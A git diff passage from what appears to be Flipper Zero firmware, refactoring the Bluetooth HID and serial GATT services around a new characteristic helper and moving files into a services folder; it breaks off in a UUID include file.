a/firmware/targets/f7/ble_glue/services/gatt_char.h b/firmware/targets/f7/ble_glue/services/gatt_char.h new file mode 100644 index 000000000..959ab67a4 --- /dev/null +++ b/firmware/targets/f7/ble_glue/services/gatt_char.h @@ -0,0 +1,96 @@ +#pragma once + +#include +#include +#include + +#include + +#ifdef __cplusplus +extern "C" { +#endif + +// Callback signature for getting characteristic data +// Is called when characteristic is created to get max data length. Data ptr is NULL in this case +// The result is passed to aci_gatt_add_char as "Char_Value_Length" +// For updates, called with a context - see flipper_gatt_characteristic_update +// Returns true if *data ownership is transferred to the caller and will be freed +typedef bool (*cbFlipperGattCharacteristicData)( + const void* context, + const uint8_t** data, + uint16_t* data_len); + +typedef enum { + FlipperGattCharacteristicDataFixed, + FlipperGattCharacteristicDataCallback, +} FlipperGattCharacteristicDataType; + +typedef struct { + Char_Desc_Uuid_t uuid; + struct { + cbFlipperGattCharacteristicData fn; + const void* context; + } data_callback; + uint8_t uuid_type; + uint8_t max_length; + uint8_t security_permissions; + uint8_t access_permissions; + uint8_t gatt_evt_mask; + uint8_t is_variable; +} FlipperGattCharacteristicDescriptorParams; + +typedef struct { + const char* name; + FlipperGattCharacteristicDescriptorParams* descriptor_params; + union { + struct { + const uint8_t* ptr; + uint16_t length; + } fixed; + struct { + cbFlipperGattCharacteristicData fn; + const void* context; + } callback; + } data; + Char_UUID_t uuid; + // Some packed bitfields to save space + FlipperGattCharacteristicDataType data_prop_type : 2; + uint8_t is_variable : 2; + uint8_t uuid_type : 2; + uint8_t char_properties; + uint8_t security_permissions; + uint8_t gatt_evt_mask; +} FlipperGattCharacteristicParams; + +_Static_assert( + sizeof(FlipperGattCharacteristicParams) == 36, + "FlipperGattCharacteristicParams size must be 36 bytes"); + +typedef struct { + const FlipperGattCharacteristicParams* characteristic; + uint16_t handle; + uint16_t descriptor_handle; +} FlipperGattCharacteristicInstance; + +// Initialize a characteristic instance; copies the characteristic descriptor into the instance +void flipper_gatt_characteristic_init( + uint16_t svc_handle, + const FlipperGattCharacteristicParams* char_descriptor, + FlipperGattCharacteristicInstance* char_instance); + +// Delete a characteristic instance; frees the copied characteristic descriptor from the instance +void flipper_gatt_characteristic_delete( + uint16_t svc_handle, + FlipperGattCharacteristicInstance* char_instance); + +// Update a characteristic instance; if source==NULL, uses the data from the characteristic +// - For fixed data, fixed.ptr is used as the source if source==NULL +// - For callback-based data, collback.context is passed as the context if source==NULL +bool flipper_gatt_characteristic_update( + uint16_t svc_handle, + FlipperGattCharacteristicInstance* char_instance, + const void* source); + +#ifdef __cplusplus +} +#endif \ No newline at end of file diff --git a/firmware/targets/f7/ble_glue/services/hid_service.c b/firmware/targets/f7/ble_glue/services/hid_service.c new file mode 100644 index 000000000..d3fad0108 --- /dev/null +++ b/firmware/targets/f7/ble_glue/services/hid_service.c @@ -0,0 +1,366 @@ +#include "hid_service.h" +#include "app_common.h" +#include +#include "gatt_char.h" + +#include + +#define TAG "BtHid" + +typedef enum { + HidSvcGattCharacteristicProtocolMode = 0, + HidSvcGattCharacteristicReportMap, + HidSvcGattCharacteristicInfo, + HidSvcGattCharacteristicCtrlPoint, + HidSvcGattCharacteristicLed, + HidSvcGattCharacteristicCount, +} HidSvcGattCharacteristicId; + +typedef struct { + uint8_t report_idx; + uint8_t report_type; +} HidSvcReportId; + +static_assert(sizeof(HidSvcReportId) == sizeof(uint16_t), "HidSvcReportId must be 2 bytes"); + +static const Service_UUID_t hid_svc_uuid = { + .Service_UUID_16 = HUMAN_INTERFACE_DEVICE_SERVICE_UUID, +}; + +static bool + hid_svc_char_desc_data_callback(const void* context, const uint8_t** data, uint16_t* data_len) { + const HidSvcReportId* report_id = context; + *data_len = sizeof(HidSvcReportId); + if(data) { + *data = (const uint8_t*)report_id; + } + return false; +} + +typedef struct { + const void* data_ptr; + uint16_t data_len; +} HidSvcDataWrapper; + +static bool + hid_svc_report_data_callback(const void* context, const uint8_t** data, uint16_t* data_len) { + const HidSvcDataWrapper* report_data = context; + if(data) { + *data = report_data->data_ptr; + *data_len = report_data->data_len; + } else { + *data_len = HID_SVC_REPORT_MAP_MAX_LEN; + } + return false; +} + +// LED Descriptor params for BadBT + +static uint8_t led_desc_context_buf[2] = {HID_SVC_REPORT_COUNT + 1, 2}; + +static FlipperGattCharacteristicDescriptorParams hid_svc_char_descr_led = { + .uuid_type = UUID_TYPE_16, + .uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID, + .max_length = HID_SVC_REPORT_REF_LEN, + .data_callback.fn = hid_svc_char_desc_data_callback, + .data_callback.context = led_desc_context_buf, + .security_permissions = ATTR_PERMISSION_NONE, + .access_permissions = ATTR_ACCESS_READ_WRITE, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT, +}; + +static const FlipperGattCharacteristicParams hid_svc_chars[HidSvcGattCharacteristicCount] = { + [HidSvcGattCharacteristicProtocolMode] = + {.name = "Protocol Mode", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = 1, + .uuid.Char_UUID_16 = PROTOCOL_MODE_CHAR_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ | CHAR_PROP_WRITE_WITHOUT_RESP, + .security_permissions = ATTR_PERMISSION_NONE, + .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [HidSvcGattCharacteristicReportMap] = + {.name = "Report Map", + .data_prop_type = FlipperGattCharacteristicDataCallback, + .data.callback.fn = hid_svc_report_data_callback, + .data.callback.context = NULL, + .uuid.Char_UUID_16 = REPORT_MAP_CHAR_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ, + .security_permissions = ATTR_PERMISSION_NONE, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_VARIABLE}, + [HidSvcGattCharacteristicInfo] = + {.name = "HID Information", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = HID_SVC_INFO_LEN, + .data.fixed.ptr = NULL, + .uuid.Char_UUID_16 = HID_INFORMATION_CHAR_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ, + .security_permissions = ATTR_PERMISSION_NONE, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [HidSvcGattCharacteristicCtrlPoint] = + {.name = "HID Control Point", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = HID_SVC_CONTROL_POINT_LEN, + .uuid.Char_UUID_16 = HID_CONTROL_POINT_CHAR_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_WRITE_WITHOUT_RESP, + .security_permissions = ATTR_PERMISSION_NONE, + .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [HidSvcGattCharacteristicLed] = + { + .name = + "HID LED State", // LED Characteristic and descriptor for BadBT to get numlock state for altchars + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = 1, + .uuid.Char_UUID_16 = REPORT_CHAR_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ | CHAR_PROP_WRITE_WITHOUT_RESP | CHAR_PROP_WRITE, + .security_permissions = ATTR_PERMISSION_NONE, + .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE | + GATT_NOTIFY_WRITE_REQ_AND_WAIT_FOR_APPL_RESP, + .is_variable = CHAR_VALUE_LEN_CONSTANT, + .descriptor_params = &hid_svc_char_descr_led, + }, +}; + +static const FlipperGattCharacteristicDescriptorParams hid_svc_char_descr_template = { + .uuid_type = UUID_TYPE_16, + .uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID, + .max_length = HID_SVC_REPORT_REF_LEN, + .data_callback.fn = hid_svc_char_desc_data_callback, + .security_permissions = ATTR_PERMISSION_NONE, + .access_permissions = ATTR_ACCESS_READ_WRITE, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT, +}; + +static const FlipperGattCharacteristicParams hid_svc_report_template = { + .name = "Report", + .data_prop_type = FlipperGattCharacteristicDataCallback, + .data.callback.fn = hid_svc_report_data_callback, + .data.callback.context = NULL, + .uuid.Char_UUID_16 = REPORT_CHAR_UUID, + .uuid_type = UUID_TYPE_16, + .char_properties = CHAR_PROP_READ | CHAR_PROP_NOTIFY, + .security_permissions = ATTR_PERMISSION_NONE, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_VARIABLE, +}; + +typedef struct { + uint16_t svc_handle; + FlipperGattCharacteristicInstance chars[HidSvcGattCharacteristicCount]; + FlipperGattCharacteristicInstance input_report_chars[HID_SVC_INPUT_REPORT_COUNT]; + FlipperGattCharacteristicInstance output_report_chars[HID_SVC_OUTPUT_REPORT_COUNT]; + FlipperGattCharacteristicInstance feature_report_chars[HID_SVC_FEATURE_REPORT_COUNT]; + // led state + HidLedStateEventCallback led_state_event_callback; + void* led_state_ctx; +} HIDSvc; + +static HIDSvc* hid_svc = NULL; + +static SVCCTL_EvtAckStatus_t hid_svc_event_handler(void* event) { + SVCCTL_EvtAckStatus_t ret = SVCCTL_EvtNotAck; + hci_event_pckt* event_pckt = (hci_event_pckt*)(((hci_uart_pckt*)event)->data); + evt_blecore_aci* blecore_evt = (evt_blecore_aci*)event_pckt->data; + // aci_gatt_attribute_modified_event_rp0* attribute_modified; + if(event_pckt->evt == HCI_VENDOR_SPECIFIC_DEBUG_EVT_CODE) { + if(blecore_evt->ecode == ACI_GATT_ATTRIBUTE_MODIFIED_VSEVT_CODE) { + // Process modification events + ret = SVCCTL_EvtAckFlowEnable; + } else if(blecore_evt->ecode == ACI_GATT_SERVER_CONFIRMATION_VSEVT_CODE) { + // Process notification confirmation + ret = SVCCTL_EvtAckFlowEnable; + } else if(blecore_evt->ecode == ACI_GATT_WRITE_PERMIT_REQ_VSEVT_CODE) { + // LED Characteristic and descriptor for BadBT to get numlock state for altchars + // + // Process write request + aci_gatt_write_permit_req_event_rp0* req = + (aci_gatt_write_permit_req_event_rp0*)blecore_evt->data; + + furi_check(hid_svc->led_state_event_callback && hid_svc->led_state_ctx); + + // this check is likely to be incorrect, it will actually work in our case + // but we need to investigate gatt api to see what is the rules + // that specify attibute handle value from char handle (or the reverse) + if(req->Attribute_Handle == (hid_svc->chars[HidSvcGattCharacteristicLed].handle + 1)) { + hid_svc->led_state_event_callback(req->Data[0], hid_svc->led_state_ctx); + aci_gatt_write_resp( + req->Connection_Handle, + req->Attribute_Handle, + 0x00, /* write_status = 0 (no error))*/ + 0x00, /* err_code */ + req->Data_Length, + req->Data); + aci_gatt_write_char_value( + req->Connection_Handle, + hid_svc->chars[HidSvcGattCharacteristicLed].handle, + req->Data_Length, + req->Data); + ret = SVCCTL_EvtAckFlowEnable; + } + } + } + return ret; +} + +void hid_svc_start() { + tBleStatus status; + hid_svc = malloc(sizeof(HIDSvc)); + + // Register event handler + SVCCTL_RegisterSvcHandler(hid_svc_event_handler); + /** + * Add Human Interface Device Service + */ + status = aci_gatt_add_service( + UUID_TYPE_16, + &hid_svc_uuid, + PRIMARY_SERVICE, + 2 + /* protocol mode */ + (4 * HID_SVC_INPUT_REPORT_COUNT) + (3 * HID_SVC_OUTPUT_REPORT_COUNT) + + (3 * HID_SVC_FEATURE_REPORT_COUNT) + 1 + 2 + 2 + 2 + + 4, /* Service + Report Map + HID Information + HID Control Point + LED state */ + &hid_svc->svc_handle); + if(status) { + FURI_LOG_E(TAG, "Failed to add HID service: %d", status); + } + + for(size_t i = 0; i < HidSvcGattCharacteristicCount; i++) { + flipper_gatt_characteristic_init( + hid_svc->svc_handle, &hid_svc_chars[i], &hid_svc->chars[i]); + } + uint8_t protocol_mode = 1; + flipper_gatt_characteristic_update( + hid_svc->svc_handle, + &hid_svc->chars[HidSvcGattCharacteristicProtocolMode], + &protocol_mode); + + // reports + FlipperGattCharacteristicDescriptorParams hid_svc_char_descr; + FlipperGattCharacteristicParams report_char; + HidSvcReportId report_id; + + memcpy(&hid_svc_char_descr, &hid_svc_char_descr_template, sizeof(hid_svc_char_descr)); + memcpy(&report_char, &hid_svc_report_template, sizeof(report_char)); + + hid_svc_char_descr.data_callback.context = &report_id; + report_char.descriptor_params = &hid_svc_char_descr; + + typedef struct { + uint8_t report_type; + uint8_t report_count; + FlipperGattCharacteristicInstance* chars; + } HidSvcReportCharProps; + + HidSvcReportCharProps hid_report_chars[] = { + {0x01, HID_SVC_INPUT_REPORT_COUNT, hid_svc->input_report_chars}, + {0x02, HID_SVC_OUTPUT_REPORT_COUNT, hid_svc->output_report_chars}, + {0x03, HID_SVC_FEATURE_REPORT_COUNT, hid_svc->feature_report_chars}, + }; + + for(size_t report_type_idx = 0; report_type_idx < COUNT_OF(hid_report_chars); + report_type_idx++) { + report_id.report_type = hid_report_chars[report_type_idx].report_type; + for(size_t report_idx = 0; report_idx < hid_report_chars[report_type_idx].report_count; + report_idx++) { + report_id.report_idx = report_idx + 1; + flipper_gatt_characteristic_init( + hid_svc->svc_handle, + &report_char, + &hid_report_chars[report_type_idx].chars[report_idx]); + } + } +} + +bool hid_svc_update_report_map(const uint8_t* data, uint16_t len) { + furi_assert(data); + furi_assert(hid_svc); + + HidSvcDataWrapper report_data = { + .data_ptr = data, + .data_len = len, + }; + return flipper_gatt_characteristic_update( + hid_svc->svc_handle, &hid_svc->chars[HidSvcGattCharacteristicReportMap], &report_data); +} + +bool hid_svc_update_input_report(uint8_t input_report_num, uint8_t* data, uint16_t len) { + furi_assert(data); + furi_assert(hid_svc); + furi_assert(input_report_num < HID_SVC_INPUT_REPORT_COUNT); + + HidSvcDataWrapper report_data = { + .data_ptr = data, + .data_len = len, + }; + return flipper_gatt_characteristic_update( + hid_svc->svc_handle, &hid_svc->input_report_chars[input_report_num], &report_data); +} + +bool hid_svc_update_info(uint8_t* data) { + furi_assert(data); + furi_assert(hid_svc); + + return flipper_gatt_characteristic_update( + hid_svc->svc_handle, &hid_svc->chars[HidSvcGattCharacteristicInfo], &data); +} + +void hid_svc_register_led_state_callback(HidLedStateEventCallback callback, void* context) { + furi_assert(hid_svc); + furi_assert(callback); + furi_assert(context); + + hid_svc->led_state_event_callback = callback; + hid_svc->led_state_ctx = context; +} + +bool hid_svc_is_started() { + return hid_svc != NULL; +} + +void hid_svc_stop() { + tBleStatus status; + if(hid_svc) { + // Delete characteristics + for(size_t i = 0; i < HidSvcGattCharacteristicCount; i++) { + flipper_gatt_characteristic_delete(hid_svc->svc_handle, &hid_svc->chars[i]); + } + + typedef struct { + uint8_t report_count; + FlipperGattCharacteristicInstance* chars; + } HidSvcReportCharProps; + + HidSvcReportCharProps hid_report_chars[] = { + {HID_SVC_INPUT_REPORT_COUNT, hid_svc->input_report_chars}, + {HID_SVC_OUTPUT_REPORT_COUNT, hid_svc->output_report_chars}, + {HID_SVC_FEATURE_REPORT_COUNT, hid_svc->feature_report_chars}, + }; + + for(size_t report_type_idx = 0; report_type_idx < COUNT_OF(hid_report_chars); + report_type_idx++) { + for(size_t report_idx = 0; report_idx < hid_report_chars[report_type_idx].report_count; + report_idx++) { + flipper_gatt_characteristic_delete( + hid_svc->svc_handle, &hid_report_chars[report_type_idx].chars[report_idx]); + } + } + + // Delete service + status = aci_gatt_del_service(hid_svc->svc_handle); + if(status) { + FURI_LOG_E(TAG, "Failed to delete HID service: %d", status); + } + free(hid_svc); + hid_svc = NULL; + } +} diff --git a/firmware/targets/f7/ble_glue/hid_service.h b/firmware/targets/f7/ble_glue/services/hid_service.h similarity index 89% rename from firmware/targets/f7/ble_glue/hid_service.h rename to firmware/targets/f7/ble_glue/services/hid_service.h index b8f6b244d..4d0ed4c4f 100644 --- a/firmware/targets/f7/ble_glue/hid_service.h +++ b/firmware/targets/f7/ble_glue/services/hid_service.h @@ -27,6 +27,7 @@ bool hid_svc_update_report_map(const uint8_t* data, uint16_t len); bool hid_svc_update_input_report(uint8_t input_report_num, uint8_t* data, uint16_t len); -bool hid_svc_update_info(uint8_t* data, uint16_t len); +// Expects data to be of length HID_SVC_INFO_LEN (4 bytes) +bool hid_svc_update_info(uint8_t* data); void hid_svc_register_led_state_callback(HidLedStateEventCallback callback, void* context); diff --git a/firmware/targets/f7/ble_glue/serial_service.c b/firmware/targets/f7/ble_glue/services/serial_service.c similarity index 57% rename from firmware/targets/f7/ble_glue/serial_service.c rename to firmware/targets/f7/ble_glue/services/serial_service.c index c6421dc28..0db25b3d3 100644 --- a/firmware/targets/f7/ble_glue/serial_service.c +++ b/firmware/targets/f7/ble_glue/services/serial_service.c @@ -1,17 +1,67 @@ #include "serial_service.h" #include "app_common.h" #include +#include "gatt_char.h" #include +#include "serial_service_uuid.inc" + #define TAG "BtSerialSvc" +typedef enum { + SerialSvcGattCharacteristicRx = 0, + SerialSvcGattCharacteristicTx, + SerialSvcGattCharacteristicFlowCtrl, + SerialSvcGattCharacteristicStatus, + SerialSvcGattCharacteristicCount, +} SerialSvcGattCharacteristicId; + +static const FlipperGattCharacteristicParams serial_svc_chars[SerialSvcGattCharacteristicCount] = { + [SerialSvcGattCharacteristicRx] = + {.name = "RX", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = SERIAL_SVC_DATA_LEN_MAX, + .uuid.Char_UUID_128 = SERIAL_SVC_RX_CHAR_UUID, + .uuid_type = UUID_TYPE_128, + .char_properties = CHAR_PROP_WRITE_WITHOUT_RESP | CHAR_PROP_WRITE | CHAR_PROP_READ, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ | ATTR_PERMISSION_AUTHEN_WRITE, + .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE, + .is_variable = CHAR_VALUE_LEN_VARIABLE}, + [SerialSvcGattCharacteristicTx] = + {.name = "TX", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = SERIAL_SVC_DATA_LEN_MAX, + .uuid.Char_UUID_128 = SERIAL_SVC_TX_CHAR_UUID, + .uuid_type = UUID_TYPE_128, + .char_properties = CHAR_PROP_READ | CHAR_PROP_INDICATE, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_VARIABLE}, + [SerialSvcGattCharacteristicFlowCtrl] = + {.name = "Flow control", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = sizeof(uint32_t), + .uuid.Char_UUID_128 = SERIAL_SVC_FLOW_CONTROL_UUID, + .uuid_type = UUID_TYPE_128, + .char_properties = CHAR_PROP_READ | CHAR_PROP_NOTIFY, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ, + .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, + .is_variable = CHAR_VALUE_LEN_CONSTANT}, + [SerialSvcGattCharacteristicStatus] = { + .name = "RPC status", + .data_prop_type = FlipperGattCharacteristicDataFixed, + .data.fixed.length = sizeof(SerialServiceRpcStatus), + .uuid.Char_UUID_128 = SERIAL_SVC_RPC_STATUS_UUID, + .uuid_type = UUID_TYPE_128, + .char_properties = CHAR_PROP_READ | CHAR_PROP_WRITE | CHAR_PROP_NOTIFY, + .security_permissions = ATTR_PERMISSION_AUTHEN_READ | ATTR_PERMISSION_AUTHEN_WRITE, + .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE, + .is_variable = CHAR_VALUE_LEN_CONSTANT}}; + typedef struct { uint16_t svc_handle; - uint16_t rx_char_handle; - uint16_t tx_char_handle; - uint16_t flow_ctrl_char_handle; - uint16_t rpc_status_char_handle; + FlipperGattCharacteristicInstance chars[SerialSvcGattCharacteristicCount]; FuriMutex* buff_size_mtx; uint32_t buff_size; uint16_t bytes_ready_to_receive; @@ -21,17 +71,6 @@ typedef struct { static SerialSvc* serial_svc = NULL; -static const uint8_t service_uuid[] = - {0x00, 0x00, 0xfe, 0x60, 0xcc, 0x7a, 0x48, 0x2a, 0x98, 0x4a, 0x7f, 0x2e, 0xd5, 0xb3, 0xe5, 0x8f}; -static const uint8_t char_tx_uuid[] = - {0x00, 0x00, 0xfe, 0x61, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19}; -static const uint8_t char_rx_uuid[] = - {0x00, 0x00, 0xfe, 0x62, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19}; -static const uint8_t flow_ctrl_uuid[] = - {0x00, 0x00, 0xfe, 0x63, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19}; -static const uint8_t rpc_status_uuid[] = - {0x00, 0x00, 0xfe, 0x64, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19}; - static SVCCTL_EvtAckStatus_t serial_svc_event_handler(void* event) { SVCCTL_EvtAckStatus_t ret = SVCCTL_EvtNotAck; hci_event_pckt* event_pckt = (hci_event_pckt*)(((hci_uart_pckt*)event)->data); @@ -40,11 +79,14 @@ static SVCCTL_EvtAckStatus_t serial_svc_event_handler(void* event) { if(event_pckt->evt == HCI_VENDOR_SPECIFIC_DEBUG_EVT_CODE) { if(blecore_evt->ecode == ACI_GATT_ATTRIBUTE_MODIFIED_VSEVT_CODE) { attribute_modified = (aci_gatt_attribute_modified_event_rp0*)blecore_evt->data; - if(attribute_modified->Attr_Handle == serial_svc->rx_char_handle + 2) { + if(attribute_modified->Attr_Handle == + serial_svc->chars[SerialSvcGattCharacteristicRx].handle + 2) { // Descriptor handle ret = SVCCTL_EvtAckFlowEnable; FURI_LOG_D(TAG, "RX descriptor event"); - } else if(attribute_modified->Attr_Handle == serial_svc->rx_char_handle + 1) { + } else if( + attribute_modified->Attr_Handle == + serial_svc->chars[SerialSvcGattCharacteristicRx].handle + 1) { FURI_LOG_D(TAG, "Received %d bytes", attribute_modified->Attr_Data_Length); if(serial_svc->callback) { furi_check( @@ -70,7 +112,9 @@ static SVCCTL_EvtAckStatus_t serial_svc_event_handler(void* event) { furi_check(furi_mutex_release(serial_svc->buff_size_mtx) == FuriStatusOk); } ret = SVCCTL_EvtAckFlowEnable; - } else if(attribute_modified->Attr_Handle == serial_svc->rpc_status_char_handle + 1) { + } else if( + attribute_modified->Attr_Handle == + serial_svc->chars[SerialSvcGattCharacteristicStatus].handle + 1) { SerialServiceRpcStatus* rpc_status = (SerialServiceRpcStatus*)attribute_modified->Attr_Data; if(*rpc_status == SerialServiceRpcStatusNotActive) { @@ -97,18 +141,12 @@ static SVCCTL_EvtAckStatus_t serial_svc_event_handler(void* event) { } static void serial_svc_update_rpc_char(SerialServiceRpcStatus status) { - tBleStatus ble_status = aci_gatt_update_char_value( - serial_svc->svc_handle, - serial_svc->rpc_status_char_handle, - 0, - sizeof(SerialServiceRpcStatus), - (uint8_t*)&status); - if(ble_status) { - FURI_LOG_E(TAG, "Failed to update RPC status char: %d", ble_status); - } + flipper_gatt_characteristic_update( + serial_svc->svc_handle, &serial_svc->chars[SerialSvcGattCharacteristicStatus], &status); } void serial_svc_start() { + UNUSED(serial_svc_chars); tBleStatus status; serial_svc = malloc(sizeof(SerialSvc)); // Register event handler @@ -116,72 +154,17 @@ void serial_svc_start() { // Add service status = aci_gatt_add_service( - UUID_TYPE_128, (Service_UUID_t*)service_uuid, PRIMARY_SERVICE, 12, &serial_svc->svc_handle); + UUID_TYPE_128, &service_uuid, PRIMARY_SERVICE, 12, &serial_svc->svc_handle); if(status) { FURI_LOG_E(TAG, "Failed to add Serial service: %d", status); } - // Add RX characteristics - status = aci_gatt_add_char( - serial_svc->svc_handle, - UUID_TYPE_128, - (const Char_UUID_t*)char_rx_uuid, - SERIAL_SVC_DATA_LEN_MAX, - CHAR_PROP_WRITE_WITHOUT_RESP | CHAR_PROP_WRITE | CHAR_PROP_READ, - ATTR_PERMISSION_AUTHEN_READ | ATTR_PERMISSION_AUTHEN_WRITE, - GATT_NOTIFY_ATTRIBUTE_WRITE, - 10, - CHAR_VALUE_LEN_VARIABLE, - &serial_svc->rx_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add RX characteristic: %d", status); + // Add characteristics + for(uint8_t i = 0; i < SerialSvcGattCharacteristicCount; i++) { + flipper_gatt_characteristic_init( + serial_svc->svc_handle, &serial_svc_chars[i], &serial_svc->chars[i]); } - // Add TX characteristic - status = aci_gatt_add_char( - serial_svc->svc_handle, - UUID_TYPE_128, - (const Char_UUID_t*)char_tx_uuid, - SERIAL_SVC_DATA_LEN_MAX, - CHAR_PROP_READ | CHAR_PROP_INDICATE, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_VARIABLE, - &serial_svc->tx_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add TX characteristic: %d", status); - } - // Add Flow Control characteristic - status = aci_gatt_add_char( - serial_svc->svc_handle, - UUID_TYPE_128, - (const Char_UUID_t*)flow_ctrl_uuid, - sizeof(uint32_t), - CHAR_PROP_READ | CHAR_PROP_NOTIFY, - ATTR_PERMISSION_AUTHEN_READ, - GATT_DONT_NOTIFY_EVENTS, - 10, - CHAR_VALUE_LEN_CONSTANT, - &serial_svc->flow_ctrl_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add Flow Control characteristic: %d", status); - } - // Add RPC status characteristic - status = aci_gatt_add_char( - serial_svc->svc_handle, - UUID_TYPE_128, - (const Char_UUID_t*)rpc_status_uuid, - sizeof(SerialServiceRpcStatus), - CHAR_PROP_READ | CHAR_PROP_WRITE | CHAR_PROP_NOTIFY, - ATTR_PERMISSION_AUTHEN_READ | ATTR_PERMISSION_AUTHEN_WRITE, - GATT_NOTIFY_ATTRIBUTE_WRITE, - 10, - CHAR_VALUE_LEN_CONSTANT, - &serial_svc->rpc_status_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to add RPC status characteristic: %d", status); - } serial_svc_update_rpc_char(SerialServiceRpcStatusNotActive); // Allocate buffer size mutex serial_svc->buff_size_mtx = furi_mutex_alloc(FuriMutexTypeNormal); @@ -196,13 +179,12 @@ void serial_svc_set_callbacks( serial_svc->context = context; serial_svc->buff_size = buff_size; serial_svc->bytes_ready_to_receive = buff_size; + uint32_t buff_size_reversed = REVERSE_BYTES_U32(serial_svc->buff_size); - aci_gatt_update_char_value( + flipper_gatt_characteristic_update( serial_svc->svc_handle, - serial_svc->flow_ctrl_char_handle, - 0, - sizeof(uint32_t), - (uint8_t*)&buff_size_reversed); + &serial_svc->chars[SerialSvcGattCharacteristicFlowCtrl], + &buff_size_reversed); } void serial_svc_notify_buffer_is_empty() { @@ -213,13 +195,12 @@ void serial_svc_notify_buffer_is_empty() { if(serial_svc->bytes_ready_to_receive == 0) { FURI_LOG_D(TAG, "Buffer is empty. Notifying client"); serial_svc->bytes_ready_to_receive = serial_svc->buff_size; + uint32_t buff_size_reversed = REVERSE_BYTES_U32(serial_svc->buff_size); - aci_gatt_update_char_value( + flipper_gatt_characteristic_update( serial_svc->svc_handle, - serial_svc->flow_ctrl_char_handle, - 0, - sizeof(uint32_t), - (uint8_t*)&buff_size_reversed); + &serial_svc->chars[SerialSvcGattCharacteristicFlowCtrl], + &buff_size_reversed); } furi_check(furi_mutex_release(serial_svc->buff_size_mtx) == FuriStatusOk); } @@ -227,22 +208,8 @@ void serial_svc_notify_buffer_is_empty() { void serial_svc_stop() { tBleStatus status; if(serial_svc) { - // Delete characteristics - status = aci_gatt_del_char(serial_svc->svc_handle, serial_svc->tx_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete TX characteristic: %d", status); - } - status = aci_gatt_del_char(serial_svc->svc_handle, serial_svc->rx_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete RX characteristic: %d", status); - } - status = aci_gatt_del_char(serial_svc->svc_handle, serial_svc->flow_ctrl_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete Flow Control characteristic: %d", status); - } - status = aci_gatt_del_char(serial_svc->svc_handle, serial_svc->rpc_status_char_handle); - if(status) { - FURI_LOG_E(TAG, "Failed to delete RPC Status characteristic: %d", status); + for(uint8_t i = 0; i < SerialSvcGattCharacteristicCount; i++) { + flipper_gatt_characteristic_delete(serial_svc->svc_handle, &serial_svc->chars[i]); } // Delete service status = aci_gatt_del_service(serial_svc->svc_handle); @@ -273,7 +240,7 @@ bool serial_svc_update_tx(uint8_t* data, uint16_t data_len) { tBleStatus result = aci_gatt_update_char_value_ext( 0, serial_svc->svc_handle, - serial_svc->tx_char_handle, + serial_svc->chars[SerialSvcGattCharacteristicTx].handle, remained ? 0x00 : 0x02, data_len, value_offset, diff --git a/firmware/targets/f7/ble_glue/serial_service.h b/firmware/targets/f7/ble_glue/services/serial_service.h similarity index 100% rename from firmware/targets/f7/ble_glue/serial_service.h rename to firmware/targets/f7/ble_glue/services/serial_service.h diff --git a/firmware/targets/f7/ble_glue/services/serial_service_uuid.inc b/firmware/targets/f7/ble_glue/services/serial_service_uuid.inc new file mode 100644 index 000000000..a297d9ad6 --- /dev/null +++ b/firmware/targets/f7/ble_glue/services/serial_service_uuid.inc @@ -0,0 +1,12 @@ + +static const Service_UUID_t service_uuid = { .Service_UUID_128 = \ + { 0x00, 0x00, 0xfe, 0x60, 0xcc, 0x7a, 0x48, 0x2a, 